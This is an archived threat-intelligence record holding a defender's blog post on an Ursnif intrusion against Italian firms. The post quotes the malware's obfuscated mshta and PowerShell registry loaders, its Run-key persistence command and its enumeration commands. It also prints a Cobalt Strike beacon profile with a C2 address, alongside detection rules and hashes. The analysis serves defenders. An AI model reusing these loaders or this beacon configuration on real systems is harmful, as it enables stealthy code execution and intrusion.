{
	"id": "2f39f1b5-475a-4167-b797-79e44410fd60",
	"created_at": "2026-04-06T01:28:56.450607Z",
	"updated_at": "2026-04-10T13:12:44.847025Z",
	"deleted_at": null,
	"sha1_hash": "f821315582d4be03690411b82ef3d23e95b7bf21",
	"title": "Ursnif VS Italy: Il PDF del Destino",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1423012,
	"plain_text": "Ursnif VS Italy: Il PDF del Destino\r\nBy Kostas\r\nPublished: 2023-07-31 · Archived: 2026-04-06 00:07:26 UTC\r\nJul 18, 2023\r\nThis is the second blog of this series, which shows the actions threat actors take during post-exploitation. Just a reminder, these short blog posts come with sanitized artifacts of the intrusion I observed, so that people can use them as training material or recreate the investigation steps I followed in their own lab. You can find the artifacts in the repo below.\r\nIntrusion_data: https://github.com/tsale/Intrusion_data\r\nSummary\r\nIn the first week of July, I observed post-exploitation activity following an Ursnif malware initial infection. Post-exploitation activity was very rapid, with threat actors enabling the VNC feature of the malware to interact with the infected host. Through VNC’s graphical interface, they quickly searched for important documents on mapped share drives. They later used the command prompt to run enumeration commands before using process injection to spawn a Cobalt Strike beacon.\r\nSeveral hours after the initial infection, the Cobalt Strike beacon came to life and the threat actors started enumerating the environment. They used their existing beacon session and attempted to elevate their access using a Zerologon exploit. After about 10 hours, I witnessed them spawning a new Cobalt Strike beacon using a PowerShell loader. This second beacon communicated with a different C2 IP. This was the last activity I observed through my analysis; it is possible that the threat actors left the infected environment, or that the gap in activity allowed for response and remediation of the infected host.\r\nFurther Intelligence Gathering\r\nDuring the Ursnif VNC sessions, I was able to extract interesting data from the unencrypted network communication. Specifically, I managed to obtain the threat actors’ clipboard as well as screenshots. 
This information provides valuable insight into the attackers’ tactics, techniques, and procedures (TTPs). It allows us to see the attack through their eyes. The respective sections below cover the relevant details of the intrusion.\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 1 of 12\n\nThe Hands-On-Keyboard (HOK) activity began 30 minutes after the initial execution of the Ursnif malware. This emphasizes the importance of promptly addressing initial access broker malware. During the intrusion, it seemed like the infected host was shared among multiple groups. This is due to the long periods of inactivity observed, the different C2 channels, and the repetitive enumeration commands run on every newly established connection to a different C2 infrastructure. Trustworthy threat intelligence sources reveal how criminals divide responsibilities during an intrusion after the initial infection.\r\nEstablishing initial access themselves is no longer really required for threat actors, there’s a good chance someone else has already done it and is happy to sell it on. ~ source by @BushidoToken\r\nIt is also possible for different threat actors to specialize in different aspects of an attack. In this case, the job of the threat actors that responded to the initial infection could have been to profile the victim host and organization. There was no activity from the beacon loaded in memory for five hours after the initial infection.\r\nDue to the sensitivity of the enclosed data, the VNC communication was not included in the network traffic artifacts. However, information on how to extract this data as well as sanitized screenshots will be shared down below.\r\nInitial Access\r\nThe phishing campaign that resulted in this intrusion targeted Italian organizations. 
The phishing email contained a PDF attachment that started the malicious execution chain, as reported by @JAMESWT_MHT in this thread.\r\nThis blog will focus on the malicious Ursnif DLL loader and the post-exploitation activity after the malware was installed on the infected host.\r\nExecution\r\nAfter the Ursnif DLL was loaded in memory, a series of automated activities took place in a very short timeframe. Here’s a visualization of the execution flow:\r\nThe malware used mshta.exe to run an encoded script from a registry key via the Explorer.exe parent process as part of the initial automated tasks.\r\n\"C:\\Windows\\System32\\mshta.exe\" \"about:\u003chta:application\u003e\u003cscript\u003eVsde='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vsde).regread('HKCU\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\98A2C439-17C5-8A1F-614C-3B5E25409F72\\\\ToolAbout'));if(!window.flag)close()\u003c/script\u003e\"\r\nHere is a breakdown of the script:\r\n‘about:’: This starting element creates an executable HTML Application loaded as a data URL.\r\n‘\u003chta:application\u003e\u003cscript\u003eVsde=’wscript.shell’;’: creates a Windows Script Host shell object.\r\n‘resizeTo(0,2);’: makes the application window practically invisible.\r\n‘eval(new ActiveXObject(Vsde).regread(‘HKCU\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\98A2C439-17C5-8A1F-614C-3B5E25409F72\\\\ToolAbout’));’: reads the registry key specified and then evaluates/runs the code found within it.\r\n‘if(!window.flag)close()’: closes the application if a specific flag is not set.\r\nThe code within the registry was a PowerShell command designed to execute scripts 
concealed within the specified registry key, all while using built-in aliases to obscure the exact function being run.\r\nThe PowerShell command:\r\n\"powershell.exe\" new-alias -name ricvpy -value gp; new-alias -name xhpsqr -value iex; xhpsqr ([System.Text.Encoding]::ASCII.GetString((ricvpy \"HKCU:Software\\AppDataLow\\Software\\Microsoft\\98A2C439-17C5-8A1F-614C-3B5E25409F72\").MarkTime))\r\nHere, gp is the built-in alias for Get-ItemProperty and iex the alias for Invoke-Expression, so the command reads the MarkTime value from the registry key, decodes it as ASCII and executes the result.\r\nFor a detailed explanation of the Ursnif execution flow, please see the relevant report that we (The DFIR Report team) released back in January: Unwrapping Ursnifs Gifts. The TTPs are identical.\r\n💡 Detection Opportunity\r\nWe can detect and hunt for process execution events that use command line interpreters such as mshta.exe or powershell.exe to read, decode and execute strings from the registry (see the Sigma rule in the IOC section at the end of the blog).\r\nPersistence\r\nUrsnif established persistence through the registry Run keys by adding an LNK file pointing to the PowerShell executable, with parameters to execute a PowerShell script saved on disk. All registry key names and malicious artifacts are randomized with each execution by the malware.\r\n\\REGISTRY\\USER\\\u003cSID\u003e\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ProcessFolder\r\n\"cmd.exe /c start C:\\\\Users\\\\\u003cuser\u003e\\\\ProcessFolder.lnk -ep unrestricted -file C:\\\\Users\\\\\u003cuser\u003e\\\\ToolAbout.ps1\"\r\n💡 Detection Opportunity\r\nIdentify any Windows registry Run and RunOnce keys that contain parameters to facilitate the execution of scripts under the C:\\Users directory. 
Depending on the environment, you may need to create a baseline of scripts that are scheduled to run on startup and exclude them.\r\nDefense Evasion\r\nThroughout the intrusion, there were many occasions where the malware used process injection. Ursnif used remote process injection to execute a beacon by spawning a thread under conhost.exe.\r\nIn a different example, Ursnif injected into explorer.exe to perform multiple functions.\r\n💡 Detection Opportunity\r\nA beacon running under the conhost.exe process was reaching out to malicious infrastructure. This is suspicious behaviour, as conhost.exe should not be making external connections at all, let alone at short, regular intervals. We can use this as an example case to detect any unexpected connections from built-in Windows binaries to hosts outside of our network.\r\nDiscovery\r\nAfter the initial infection, Ursnif executed the following automated commands on the infected host. 
The commands’ output was saved to “.bin1” files in C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp.\r\ncmd /C “wmic computersystem get domain |more \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “echo — — — →\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “systeminfo.exe \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net view \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “nslookup 127.0.0.1 \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “tasklist.exe /SVC \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “driverquery.exe \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “reg.exe query “HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall” /s \u003e\u003e C:\\Users\\\u003cuse\r\ncmd /C “nltest /domain_trusts \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “nltest /domain_trusts /all_trusts \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net view /all /domain \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net config workstation \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net view /all \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /U /C “type C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1 \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FC\r\ncmd /C “net use \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A7.bin1”\r\ncmd /C “echo — — — →\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A7.bin1”\r\ncmd /U /C “type C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A7.bin1 \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A\r\nAfter executing the enumeration 
commands, the malware exfiltrated and deleted the files with the .bin extension.\r\nFurthermore, I observed many enumeration commands via the Hands-On-Keyboard (HOK) activities. Below are the enumeration commands in question.\r\ncmd.exe /C whoami/all\r\ncmd.exe /C net group “Domain Admins” /Domain\r\ncmd.exe /C systeminfo\r\ncmd.exe /C nltest /dclist: domain.local\r\ncmd.exe /C nltest /domain_trusts\r\ncmd.exe /C ipconfig /all\r\ncmd.exe /C whoami /all\r\ncmd.exe /C ping \u003cDomainController\u003e.domain.local\r\ncmd.exe /k whoami /groups\r\ncmd.exe /k net use\r\ncmd.exe /k arp -a\r\ncmd.exe /k tasklist\r\ncmd.exe /k ping 8.8.8.8\r\n💡 Detection Opportunity\r\nWe can detect the many auto-discovery commands that run in a small time frame, usually within 1 minute from start to finish. Most initial access broker malware runs similar discovery commands in a short time span. This detection technique can help identify other malware or suspicious activity in our network.\r\nCommand and Control\r\nCommand and control communication was established initially through the Ursnif malware and later on via Cobalt Strike beacons. Please see below the atomic indicators related to the C2 infrastructure.\r\nUrsnif VNC\r\nThanks to @0xThiebaut’s tool PCAPeek, I was able to reconstruct some of the VNC traffic. More specifically, I was able to collect a threat actor’s clipboard data and gain some valuable insights into their operations.\r\nUse of LightShot capturing tool\r\nThe threat actors behind Ursnif appeared to make use of LightShot, the screen-capturing tool. Throughout their HOK activity, I found many links in their clipboard that pointed to screenshots uploaded to https://prnt.sc. 
The screenshots showed different details about the infected host, such as its network shares.\r\nMisc Interesting Clipboard Data\r\nAlong with multiple copy-paste commands, the clipboard contained the servers that hosted the admin panel used for this campaign. The URL paths and parameters found as part of the clipboard data indicated sensitive server resources related to the malware campaign.\r\nIn the interest of information gathering and ongoing threat intelligence efforts, I will not make any of the information related to the admin panel public. The information is shared with trusted groups of the infosec community.\r\nVisuals\r\nBelow, you can see sanitized visuals of the threat actor’s HOK activity recovered using PCAPeek.\r\nIOC/IOA\r\nCobalt Strike Profile\r\nBeaconType: HTTP\r\nPort: 80\r\nSleepTime: 45000\r\nMaxGetSize: 2801745\r\nJitter: 37\r\nPublicKey_MD5: a37589ce24a7082ed1c6728b50d73d02\r\nC2Server: 173.44.141.237,/jquery-3.3.1.min.js\r\nUserAgent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\nHttpPostUri: /jquery-3.3.2.min.js\r\nMalleable_C2_Instructions: Remove 1522 bytes from the end\r\n Remove 84 bytes from the beginning\r\n Remove 3931 bytes from the beginning\r\n Base64 URL-safe decode\r\n XOR mask w/ random key\r\nHttpGet_Metadata: ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n Metadata\r\n base64url\r\n prepend “__cfduid=”\r\n header “Cookie”\r\nHttpPost_Metadata: ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n SessionId\r\n mask\r\n base64url\r\n parameter “__cfduid”\r\n Output\r\n mask\r\n base64url\r\n print\r\nHttpGet_Verb: GET\r\nHttpPost_Verb: POST\r\nSpawnto_x86: %windir%\\syswow64\\dllhost.exe\r\nSpawnto_x64: %windir%\\sysnative\\dllhost.exe\r\nProxy_Behavior: Use IE settings\r\nWatermark_Hash: bfnETSwzb1Xsa2g6gr+auA==\r\nWatermark: 674054486\r\nbStageCleanup: True\r\nbCFGCaution: False\r\nKillDate: 0\r\nbProcInject_StartRWX: False\r\nbProcInject_UseRWX: False\r\nbProcInject_MinAllocSize: 17500\r\nProcInject_PrependAppend_x86: b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64: b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute: ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod: NtMapViewOfSection\r\nSuricata Rules\r\nET 
MALWARE Ursnif Variant CnC Data Exfil\r\nET MALWARE Ursnif Variant CnC Beacon 3\r\nET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)\r\nET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)\r\nET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1\r\nET EXPLOIT Possible Zerologon Phase 1/3 - NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020-1472)\r\nET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement\r\nET MALWARE Windows Microsoft Windows DOS prompt command Error not recognized\r\nET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND\r\nET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND\r\nET MALWARE Windows arp -a Microsoft Windows DOS prompt command exit OUTBOUND\r\nET INFO Dotted Quad Host RAR Request\r\nET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET MALWARE Cobalt Strike Activity (POST)\r\nET MALWARE Cobalt Strike Beacon Activity (GET)\r\nSigma Rules\r\nCustom\r\nUrsnif Discovery Commands Redirection\r\nExplorer UAC Bypass via NOUACCHECK\r\nSigma Repo\r\nSuspicious Csc.exe Source File Folder\r\nUsage Of Web Request Commands And Cmdlets\r\nExplorer NOUACCHECK Flag\r\nShare And Session Enumeration Using Net.EXE\r\nNon Interactive PowerShell Process Spawned\r\nSuspicious PowerShell Parameter Substring\r\nPowerShell Download Pattern\r\nWhoami Utility Execution\r\nUrsnif Loader\r\nMshta Executing from Registry\r\nArtifacts\r\nb565aa423ca4ba6e8c6b208c22e5b056.dll — 894668791d06262dd16740235faa3b1672e2cb5cf171954f29abaca421c09265\r\nToolAbout.ps1 — 6e8b848e7e28a1fd474bf825330bbd4c054346ad1698c68e7a59dd38232a940a\r\nbeacon.bin — 1324e7654a144c20637820a022d49c449cca1ff1d2c7e040bf23421d52146e93\r\nThank You Notes\r\nA special thanks to @JAMESWT_MHT and @reecdeep for continuously sharing information related to the latest campaigns. 
You make the world a safer place 🙏\r\nReferences\r\nhttps://www.sentinelone.com/blog/more-evil-markets-how-its-never-been-easier-to-buy-initial-access-to-compromised-networks/\r\nhttps://blog.bushidotoken.net/2022/03/one-way-or-another-initial-access.html\r\nhttps://blog.bushidotoken.net/2021/09/how-do-you-run-cybercrime-gang.html\r\nSource: https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072"
	],
	"report_names": [
		"ursnif-vs-italy-il-pdf-del-destino-5c83d6281072"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438936,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f821315582d4be03690411b82ef3d23e95b7bf21.pdf",
		"text": "https://archive.orkl.eu/f821315582d4be03690411b82ef3d23e95b7bf21.txt",
		"img": "https://archive.orkl.eu/f821315582d4be03690411b82ef3d23e95b7bf21.jpg"
	}
}